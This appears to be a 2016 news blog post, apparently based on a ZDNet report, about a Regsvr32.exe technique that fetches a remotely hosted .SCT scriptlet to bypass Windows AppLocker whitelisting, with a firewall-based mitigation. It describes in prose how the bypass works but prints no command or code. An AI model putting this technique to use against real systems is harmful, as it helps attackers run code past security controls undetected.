Monday, 25 April 2016

On 04:19 by admin   No comments
The Windows command line utility Regsvr32.exe can be exploited to bypass Microsoft Windows AppLocker protection systems, potentially leading to remote code execution.

The security flaw can be used to circumvent the app whitelist protections offered by AppLocker on business editions of Windows, versions 7 and beyond, by using the command line utility to point to a file or location controlled by an attacker.

As a result, files and scripts can be used to run an app on a Windows system.

The researcher said that COM+ scripts — XML documents which register COM objects for use in a PC’s internal system — can be created to bypass AppLocker, and it only takes a script block and deregistering the script to remove the need for admin rights.

In addition, the exploit does not require any tampering which leaves any tracks, a bonus for attackers attempting to hide their activities.

COM+ scripts, otherwise known as .SCT files, are not limited to local access, and so Smith was able to pull up script remotely. As the command line utility is also proxy and network aware, an intruder could cause havoc in a system once a PC is compromised.

“All you need to do is host your .SCT file at a location you control,” the researcher said. “It’s not well documented that Regsvr32.exe can accept a url for a script.
In order to trigger this bypass, place the code block, either VB or JS inside the registration element.”

A proof-of-concept (PoC) code is available on GitHub.

There is currently no patch for the security flaw. In the meantime, however, you can block Regsvr32.exe with Windows Firewall to mitigate the problem.

Too many organizations fail to align their IT-security capabilities with the company’s larger goals and appetite for risk.

ZDNet has reached out to Microsoft and will update if we hear back.


Post a comment